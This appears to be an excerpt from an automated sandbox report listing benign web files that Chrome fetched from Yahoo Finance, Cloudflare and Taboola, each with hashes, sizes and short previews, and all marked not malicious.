                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):36545
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.972049383246445
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:HjCTDQyn/MIz2pZ5qhIqtQM4yAPgr5Td/Jx+HR85Ex5FE8g26c9xvg:HjCTtnHz2pZwhIqtQM4y0gl528mHOq9W
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AC72A784782BA884E027D791FE967953
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BD571096ED58E7BCDA6DB6AC58A5126F53A139B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:622FDCF73E7F821EFB22C107E6597876324462CBBD7D4B841663FB43C1EA63E8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:40A3E32C1DFFD921011DFA4016EB882B646E29B8972643AB3E5956EA506F535FF32A101A3D44C90D61D294424FDEE11F385D5CF324C39E3DA4D8AC263E9E0FDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C......................................................................................................................N..........................!1..AQ"aq..2..B....#3Rb...$Cr.......%s.45DSUc..'ET................................1.......................!1...A.Q.".#Ba23R..b$S..............?...L|.....@t0...2:C@tR....T....U.E .......Q .7..+.......K@.....S.....@..X.R..liX.0D.w4@.sD6....J...xdP*....@.s.@.@..x.Y+.......V..5..s.F...~....k.1`.A....o...)..nt..grL...,....-..PY.o]..$P.{Ev...=..BA..7.0.<.0.L?#K.@.aKv..Br.);..(...$..$..|.U..|.(>_8.i....D"..."[.{D5b9h.....*..I.!.5N.m.;.);...hh..O(. .o.....8..<.p...t.A..h.)......."..q......"b@>o(.;7.C`vo(..f..bZ..q.Q,h.-.P.b.K.)1.....X.G..IiX.AW=.a.-.@.3^..p*.7...g......v......cDH.H......r...`....&):..."..@.....N.2[.."....@....6"...L5...h...:....a..m..a...r@....vqr4.-..="......G...v()p.!.......Z.y...$..6.4....b.h.R.L..F,..K......b...RV"..v......
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (4516)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4525
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.350142365144361
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:Sq9D8re18dON8daD8Slh1w3s3FIM6S1J9YLylUtyNoHK9tlBpYk8GA7foc33Dua5:z9D8re1NNlDf1z1IMV1JyumENoqpBpYJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3707D6627828F078EFF604523AE380A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6030E5E164407942E2870F32A26F70921B79C302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:ABD66EB5C8D38D1433AB539B8E4AE525AF017D966808B29EA749CB8215FDAFA0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D54CA239C629A39DD725A516CB629292B85A328E280CF8818D26C23A1038C5E7104B78CB2B5F61C0A3C4C4B00467D56431A758F5186EDC13C742C40EE1DCBA58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as V,e as v,b as E,d as A,f as D,j as O,i as m,q as B,L as P,k as _,l as d,I as F,t as p,h as g,m as R,p as T,n as y}from"./scheduler.Dsuh-FKt.js";import{S as j,i as G,c as S,b as w,m as I,t as h,a as b,d as L,g as J,e as K}from"./index.CvwOawEI.js";import{f as Q,ak as C}from"./commonUtil.BWwawKjd.js";import{f as N}from"./datetimeUtils.BKCxat1F.js";import{I as U}from"./Image.CSsvaScR.js";import{I as W}from"./Icon.C8w5V9EK.js";import{S as X}from"./StatusTag.Cy1VuVbC.js";import{l as Y}from"./yf-lock.ClgspVU1.js";const k={Argus:"https://s.yimg.com/cv/apiv2/finance/subscription/ArgusLogo.png","Argus Research":"https://s.yimg.com/cv/apiv2/finance/subscription/ArgusLogo.png",Morningstar:"https://s.yimg.com/cv/apiv2/finance/subscription/MorningstarLogo.png"};function q(i){let e,t;return{c(){e=v("span"),t=p(i[0])},l(n){e=A(n,"SPAN",{});var a=D(e);t=g(a,i[0]),a.forEach(m)},m(n,a){_(n,e,a),d(e,t)},p(n,a){a&1&&R(t,n[0])},d(n){n&&m(e)}}}function z(i){let e,t,n;return{c(){e=p("."),t=v("s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.209962500721158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YEOBHaN+gDLL6:YEOB8X6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:10A3028609944F09387DEF111AE944FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:70EEF56CEC459FBDEB5B33065FC438BE986E6C89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A7B8F3B89F392024CC22D5966A07E2D07416A3AEEAE9A79D3807B22DC4AA8FB4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:41FD552C60F06B8014A7340810E6E6FE592C3FB653419334EBDDD714C98FCC6FD4AAFA4111056DEF5BB4DFBB98CA18EDD1C4387939607647ABA78428A2871F37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ups.analytics.yahoo.com/ups/58834/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"axid": "y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.3502090290998976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:dRYto:Tuo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E000ACEF32012A650D8C243D77C7302C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:50624C2BAE8FE1A6DA065AB4BCA1C96822AE1820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E3933184560739B70B60E2D0E48A6C7D7E18F76D95362E11F4155267700AC3A7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D88E2A944FB1B88903CB2B7E207AE289C01770C3FD30A9A76F2031CAECC048AD474603FE393056F9C6E1A34BC6DD6A626CAD90773871095D11CED1241F49C061
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7977), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7977
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.139495302416975
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3YwuuruQt21pxX3W9pOy1zraiGzTX2mD9v6KELqGG85rF04Av:3YDuqQo1pxsOyVra7zTGmBvEzrFhAv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:69D9917872FF1011BCB87D5044F6E12D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DB61157780300B24416F639DF9FB24C5A0829516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F9F7F659C467019A4E8CA49A95810AFD7BAA0A791542C4041E0C0E828A86C18D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1F0B45E4D82F4A1BBC1CBBF6461DC069AC724D7FF1919839732CC94735034A958A40865A53F013700A3D7C3657217A199A8F8DCDAEB07BF586C1531253FCF2DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-geolocation",[],t):"object"==typeof exports?exports["wafer-geolocation"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-geolocation"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (835)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.245192339796388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:KhmEpqLt1QiMW3oWzRiad9UHVU3vMIMceTS2zJ8tYqYfJii9STxoI4hEy84IVvn:pEs1Q9yBliocV33bTuVikNwwVvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EBC1FF8FB4A187073CB7ED5389CFC775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0F76E27417481C05C89B82E39D5B488CA6FCF40B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:43F204B7EC61316419D65D4326C38037B157A63998EADADAE235EBEBA291E629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1DFF6A835EBCC0806E6EA3CD631D0683545DFC7A353D1885140F0DAB9E23B106262D646E83E3C38124D1AC4171D8AAC50D02BFEA018DD85FFC4843F969779592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SocialIcon.DKAjwa0M.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as c}from"./scheduler.Dsuh-FKt.js";import{S as s,i as m,c as f,b as p,m as u,t as _,a as l,d as g}from"./index.CvwOawEI.js";import{T as k,L as b,F as i}from"./twitter-x-round.YxAnOas2.js";import{I}from"./Icon.C8w5V9EK.js";function d(a){let n,e;return n=new I({props:{icon:a[0],size:"xx-large",type:"primary"}}),{c(){f(n.$$.fragment)},l(t){p(n.$$.fragment,t)},m(t,o){u(n,t,o),e=!0},p(t,[o]){const r={};o&1&&(r.icon=t[0]),n.$set(r)},i(t){e||(_(n.$$.fragment,t),e=!0)},o(t){l(n.$$.fragment,t),e=!1},d(t){g(n,t)}}}function w(a,n,e){let{variant:t}=n,o=i;return a.$$set=r=>{"variant"in r&&e(1,t=r.variant)},a.$$.update=()=>{if(a.$$.dirty&2)switch(t){case"facebook":e(0,o=i);break;case"linkedin":e(0,o=b);break;case"twitter":e(0,o=k);break}},[o,t]}class $ extends s{constructor(n){super(),m(this,n,w,d,c,{variant:1})}}export{$ as S};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (830)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20392278255627
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:JFCFnDGaGXLqdtysALYk4voFbqwuAd55VuWj:JFknDGSYsALYhvkbum55wWj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FF0039543C479A49ECCFABE7F24D7188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7855BD3757541BCED2984F96F2B7CE345D08AD49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7BBB99D79FAD96AA1CB1D6EDB517EEF44EBDEC76F369F68E40E5F1690FA16277
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DD29C802D6648ADFDFC4E5CDE5A8330430564367D5B3981871408C5C22C2C9A526BF41CF7830C76AB3543631293932C6D9CE081007B1DE13CEC56E66A01CB985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/nodes/1.BvZHEcz2.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as x,e as u,t as h,b as S,d,f as v,h as b,i as m,j,k as _,l as g,m as E,n as $,o as k}from"../chunks/scheduler.Dsuh-FKt.js";import{S as q,i as y}from"../chunks/index.CvwOawEI.js";import{p as C}from"../chunks/stores.BCwnb1-k.js";function H(i){var f;let t,s=i[0].status+"",r,o,n,p=((f=i[0].error)==null?void 0:f.message)+"",c;return{c(){t=u("h1"),r=h(s),o=S(),n=u("p"),c=h(p)},l(e){t=d(e,"H1",{});var a=v(t);r=b(a,s),a.forEach(m),o=j(e),n=d(e,"P",{});var l=v(n);c=b(l,p),l.forEach(m)},m(e,a){_(e,t,a),g(t,r),_(e,o,a),_(e,n,a),g(n,c)},p(e,[a]){var l;a&1&&s!==(s=e[0].status+"")&&E(r,s),a&1&&p!==(p=((l=e[0].error)==null?void 0:l.message)+"")&&E(c,p)},i:$,o:$,d(e){e&&(m(t),m(o),m(n))}}}function P(i,t,s){let r;return k(i,C,o=>s(0,r=o)),[r]}class B extends q{constructor(t){super(),y(this,t,P,H,x,{})}}export{B as component};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (47261)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):47262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3974731018213795
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (788)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.34006332637445
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:OJKGJND4kQ9dSO6E+sl1XSDQkQSYRSYWu6jlqDq:atp4r3OEjl1iUkQ/R9r6jkDq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3064FD915108C4936EA6E13DE4AEDBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7E3D1EF062A1B0A5E2A17987A1230FBC7FED7899
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:416D515D143CA4553B9D03A5CE9B0834981DF94B4AA52DD2918AD6F743020543
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1A33E729CA863424986C59284A1533D3092A1E4A7CE1F8BC46837C9E3B6BADF97CA97E68C8D11CB41C371859FE7C79B096D3BE7EA0A06E7375044DB4600125D2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{a2 as x,a3 as f}from"./scheduler.Dsuh-FKt.js";function h(t){const r=t-1;return r*r*r+1}function v(t){return t/=.5,t<1?.5*t*t:(t--,-.5*(t*(t-2)-1))}function F(t,{delay:r=0,duration:p=400,easing:c=x}={}){const s=+getComputedStyle(t).opacity;return{delay:r,duration:p,easing:c,css:a=>`opacity: ${a*s}`}}function w(t,{delay:r=0,duration:p=400,easing:c=h,x:s=0,y:a=0,opacity:l=0}={}){const i=getComputedStyle(t),d=+i.opacity,n=i.transform==="none"?"":i.transform,e=d*(1-l),[u,y]=f(s),[_,m]=f(a);return{delay:r,duration:p,easing:c,css:($,g)=>`....transform: ${n} translate(${(1-$)*u}${y}, ${(1-$)*_}${m});....opacity: ${d-e*g}`}}function C(t,{delay:r=0,duration:p=400,easing:c=h,axis:s="y"}={}){const a=getComputedStyle(t),l=+a.opacity,i=s==="y"?"height":"width",d=parseFloat(a[i]),n=s==="y"?["top","bottom"]:["left","right"],e=n.map(o=>`${o[0].toUpperCase()}${o.slice(1)}`),u=parseFloat(a[`padding${e[0]}`]),y=parseFloat(a[`padding${e[1]}`]),_=parseFloat(a[`margin${e[0]}`]),m=parseFloat(a[`margin$
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.821189188225222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:q3llbEBrMFBnUb7wl2eambhD2xakD9sYDtPNutEa7njWBJUSyAfkJ2Axxll+EYPW:q3HERMFBs8EePCxachatSyyU0dP5Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0EF42A67AEC0F7C34642D374A2B10FE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:110FD90EA16F09A6229418E2C754BB200CA0A420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E475589F859892FDF87D7AB343F0D0014171416E852EE65664D0DA44CEE5569A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FD12D0259AD116CC6F2A8A1AAFC42B5259661B71F1F4099E736BF5D8FB09E6A2DFA45744B9C5725402BE60A628FAB4F99E92BA3A56072C052D1D8274819AFDD0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pm-widget.taboola.com/yahooweb-network/load.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:..if (typeof _tb_dis === 'undefined' || _tb_dis === null) {. var _tb_dis = false;.}.if (!_tb_dis) {. var pm_ppy = "yahooweb-network";.. var _pmep = '//pm-widget.taboola.com/';. var _pmep_geo = '//pm-widget.taboola.com/';. if (document.URL.indexOf('https://') > -1) {. _pmep = _pmep.replace(/88\//gi, '90/');. _pmep_geo = _pmep_geo.replace(/88\//gi, '90/');. }. var _pmpmk = pm_ppy + '/pmk-20220605.1.js';. var _pmasync = true;. var _pmoptimization = true;. var _pmoptimizationmanipulation = true;. var _pmhp = false;. var _pmsb = false;.. function _pmloadfile(fileName) {.. if (_pmasync) {. var js, elements = document.getElementsByTagName("head")[0];. js = document.createElement("script");. js.setAttribute("type", "text/javascript");. js.setAttribute("src", fileName);. js.setAttribute('async','');. js.setAttribute('crossorigin', 'anonymous');. elements.appen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3121)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.459156014316713
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:wb0w7/mFB9KAa6ucsX9v59p5VWTEXeKYfoI:wbBjyaAa6ktv59BaEXeKsoI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:75E1972C3A8D223FF478C7B4737E2149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:55909427FB5451916924F2E22B47BAA49C871895
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:29FF7BFBB8CBBC633D26B983BFDD4494C3FDD2529C50F24A48EE678A5F7D6D5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E3D1C43562049C7D8D2A64797C735F8808BC862131DE3A97D77E928B26F846ADDC35E99AD664FE81A93D4AB6B47EBF86EBCCDC2EA6BDD56A2C275118AC46866D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Image.CSsvaScR.js
